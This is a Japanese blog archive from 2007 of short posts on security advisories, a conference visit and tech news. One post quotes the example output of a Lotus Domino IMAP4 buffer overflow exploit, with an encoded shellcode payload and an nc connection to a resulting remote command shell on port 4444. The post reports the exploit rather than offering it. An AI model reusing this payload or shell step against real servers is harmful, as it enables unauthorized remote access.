ちょっと知人の宣伝:sumemiya 07年07月

セキュリティ

ぉっと見つけてしまった、ポスターとバナーを作ってくれた森君のサイトかな?

特撮好きで、超合金を研究していた上司ですねw、ポスターとバナー本当にありがとう!

仕事場の上司が実は我が大学出身でmixiの大学コミュの副管理人で特撮好きで
こんな勉強会を企画するグループに入ってたりするんですよ
お手伝いでポスターとかバナーとか作らせて貰ったりしてました
一日万単位のヒットしてるIT系のブログで紹介するんだとさー
実感無い所で超絶羞恥プレイ、いかんな未熟すぎる
時間が無いときだったのもあるけどもっとカッコいいの作れば良かったな

Open Source Conference 2007 Kansai - おいでやす

雑記

結局オープンソースカンファレンスは、20日、21日と2日行きました。

みやはらさんと、久々にお会いしたが、覚えてくれていてうれしかった!
kinnekoさんと初顔合わせ!うれしかったー!いーとんさんにもあえたーパワフルな人だったー

20日人は普通くらいかな、KCGの学生さんも通ってらっしゃった。
 企業ブースとかしっかりしていて、興味深く見回っていました。
 Hinemosとか、NRILinuxサポート救急隊とか面白かったです。
 企業ブース以外はいつも通りですね。
 正直一般の人は引きますね・・・あの雰囲気。

 うちの勉強会も、一般人からみたら、あんな感じなんだろうなぁ・・・・・・・
 あんまり、濃くしたら、引かれるし、濃くしないと
 リピーターはないし、関係も薄くなるし・・・
 難しいブレンド具合ですね・・・
 

JPCERT/CCな人たちとは、仲良く慣れたw

(@らんだむでも、まっちゃ139でもJPCERT/CCの中の人と一緒にセキュリティを語るってのを快諾してもらえたーーー!)

21日人大杉
 知った顔もかなりいました!短時間で、撤収
 てか、行ったら撤収時間だった罠w

Windows Vista 用 iTunes のビデオ再生パフォーマンスの問題のトラブルシューティング

セキュリティ

Vistaにおいて、iTunesのビデオ再生で映像がゆがんだり止まったりする不具合があるそうです。

Windows Vista における iTunes でのビデオ再生時に、映像が歪む、断続的に一時停止する、またはオーディオが画面の映像と同期されていないなどの問題が発生する場合は、以下の点を確認してください。

この辺で対応するそうです。

Lotus Domino IMAP4 Server 6.5.4 Remote Buffer Overflow Exploit

セキュリティ

Lotus DominoのIMAP4サーバーにおいて脆弱性が存在してそれを攻撃してバックドアのポートを開く攻撃コードが出ています。E:\Lotus\Dominoって・・・

# For example:
# C:\work\exploits\imap>poc.py
# [*] sending payload
# [*] sending payload
# [*] sending payload
# [*] sending payload
# * OK Domino IMAP4 Server Release 6.5.4 ready Tue, 26 Jun 2007 15:18:36 +0100
#
# PDAwNEU5QkNCLjgwMjU3MzA2LjAwMDAwOUY4LjAwMDAwMDA5QERNQz4=
#
# sending...
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
# kJCQkJCQkJCQkJCQkJCQkJCQkJCQkNvS2XQk9FgpybEKu3E1If4xWBcDWBeDmcnDC2rgYnVG+2Q3
# BG5572VAQQov6VasmyGZmqi4dlFEk/x9Zwv0gcDrZXeQkJCD6FKD6FKD6FL/4CB4OcnLXAvHq421
# M2iR5FFG
#
#
# C:\work\exploits\imap>nc -vv 192.168.126.130 4444
# 2KVM-DC [192.168.126.130] 4444 (?) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-1999 Microsoft Corp.
#
# E:\Lotus\Domino>

KDDI、いきなり基本使用料が半額になる「誰でも割」を発表 - GIGAZINE

セキュリティ

とぅたゃ君経由

とんでもないサービスだ。月額使用料が半額ですか・・・

これって、使用年数による割引が無くなる感じかな。てか、年割でも11年で25%なんだから意味無いのか。

KDDIが携帯電話サービス「au」向けに9月1日(土)より、家族利用・単独利用・法人利用や利用年数に関わらず、「CDMA 1X WIN」の基本使用料を一律半額にする「誰でも割」を導入することを発表しました。

これにより加入したばかりでも、「誰でも割」を開始した月から月額基本使用料が一律半額になるそうです。また、基本使用料に含まれる月々の無料通話は割引後も変わらないとのこと。なにやらとんでもないサービスですねこりゃ。

はてなダイアリー日記 - スパムトラックバック拒否機能を強化しました

セキュリティ

だれか、d.hatena.ne.jpを追加しないかな(何

自分のサイトの宣伝などのために、内容と無関係のトラックバックを大量に送りつける、いわゆるスパムトラックバックに対して、はてなダイアリーではユーザーの設定によって以下の基準を満たすブログからのトラックバックを制限しております。

本日、これらのスパムトラックバック拒否機能に新しく以下の基準を追加しました。

Trend Flex Security チャットサポートサーバメンテナンスのお知らせ(2007年7月29日)

TREND

Trend Flex Securityのチャットサポートが停止するそうです。日曜日の昼間って微妙。夜中にした方がよいと思われるが・・・なぜこの時間。

この度、Trend Flex Securityにてサービスを提供しているチャットサポートのサーバを
メンテナンスのするため、下記の日程でサービスを一時停止させていただきます。

サービス停止時間 2007年 7月29日(日) 13:00 〜 17:30
停止するサービス Trend Flex Security チャットサポート

Open Source Conference 2007 Kansai - おいでやす (defiantの日記)

雑記

Asteriskは面白かったです。本当に電話が鳴ってるのに当然ながらびっくり。

Open Source Conference 2007 Kansai で Japan Asterisk User Group がブースを出していたので,店番の手伝いに出動.Microclient JR に AstLinux をインストールしたものを展示してましたが,Asterisk そのものより,この PC への注目度が高かったですね.

そりゃ、現地でも言った気がしますが、開発者とかですからね。

やっぱりネットワーク屋とかITPro屋のところだったらもう少し認知度が高い気がします。
ITProのためのOSCカンファレンスとか参加が少ないかw・・・・

意外と思ったのが,他のブースに出展しているような人でも,Asterisk を知らない人が多いということでした.初めて知って感心して帰られている方が結構いらっしゃいました.まだまだ知名度が低いんですね.

FrSIRT - Lighttpd Multiple Remote Denial of Service and Security Bypass Vulnerabilities / Exploit

セキュリティ

Lighttpdに複数のDoSを受ける脆弱性が存在するそうです。HTTPリクエストコネクションでDoSを受けるみたいです。

Plusieurs vulnerabilites ont ete identifiees dans Lighttpd, elles pourraient etre exploitees par des attaquants afin de causer un deni de service ou contourner les mesures de securite. Ces failles resultent d'erreurs presentes au niveau du traitement des connexions et requetes HTTP, ce qui pourrait permettre a des attaquants d'alterer le fonctionnement d'un serveur vulnerable ou d'acceder a des donnees protegees.

Microsoft DirectX RLE Compressed Targa Image Processing Buffer Overflow - Advisories - Secunia

セキュリティ

MicrosoftのDirextXの RLE Compressed Targa Image処理に脆弱性だそうです。細工されたTargaイメージ経由で、ヒープバッファオーバーフローするそうです。

The vulnerability is caused due to an input validation error when processing RLE compressed Targa images. This can be exploited to cause a heap-based buffer overflow via a specially crafted Targa image.

Successful exploitation allows execution of arbitrary code.

ITmedia エンタープライズ:MS DirectXに脆弱性、TGA画像で悪用の恐れ

セキュリティ

↓の脆弱性のお話ですね。

Secuniaのアドバイザリーによると、脆弱性は、RLE(Run Length Encoding)で圧縮されたTarga(TGA)形式の画像ファイルを処理する際の入力認証エラーに起因する。悪用されると、細工を施したTarga 画像を使ってヒープベースのバッファオーバーフローを誘発し、システムを制御される恐れがある。
 同社の深刻度評価は5段階で上から2番目の「Highly critical」となっている。
 影響を受けるのはMicrosoft DirectX 7.x/8.x/9.xとMicrosoft DirectX SDK

Winny検知でデータ復号させない暗号化ソフト「SD‐Find Winny 2.0」

セキュリティ

WinnyとShareが入っているソフトでは複合できない暗号化ソフトだそうです。てか、、、、まだny使ってるの???

暗号化方式がRC4ってことは、秘密鍵暗号?RC4(ARCFOUR)とは - IT用語辞典

イーディーコントライブは、ファイル交換ソフトWinny」と「Share」がインストールされているPCでは復号できない暗号化ファイルを作成するソフト「SD‐Find Winny 2.0」を7月末に発売する。対応OSはWindows Vista/XP/2000。価格はオープンプライスで、予想価格は1ライセンスあたり4,200円。
SD‐Find Winny 2.0は、自己復号形式の暗号化ファイルを作成するソフトウェアで、2006年3月に発売した同様のソフト「Safety Disclosure Find Winny」のバージョンアップ版。ファイルの復号処理の際にPCのHDDをスキャンし、WinnyやShareが存在する場合には復号プログラムの起動を停止するのが特徴だ。これにより、データ移送先におけるファイル交換ソフト経由の情報漏洩を防止できるという。暗号化アルゴリズムは、128ビットの RC4をサポートする。

ひっそりとAmiga OS 4.0がアップデート | パソコン | マイコミジャーナル

セキュリティ

AmigaOSって懐かしいなぁw

Hyperion Entertainmentは18日(ベルギー時間)、Amiga OS 4.0の最新アップデータを登録ユーザ向けに公開した。

今回のアップデートでは、カーネルのExecSGを更新。プログラムからメモリを保護するガードページのスタックが実装されたほか、タスクの排他制御用にミューテックスが採用された。大部分のPOSIXスレッド関数(pthreads)に対応したライブラリが追加、カーネルにもpthreadsモジュールのサポートが加えられている。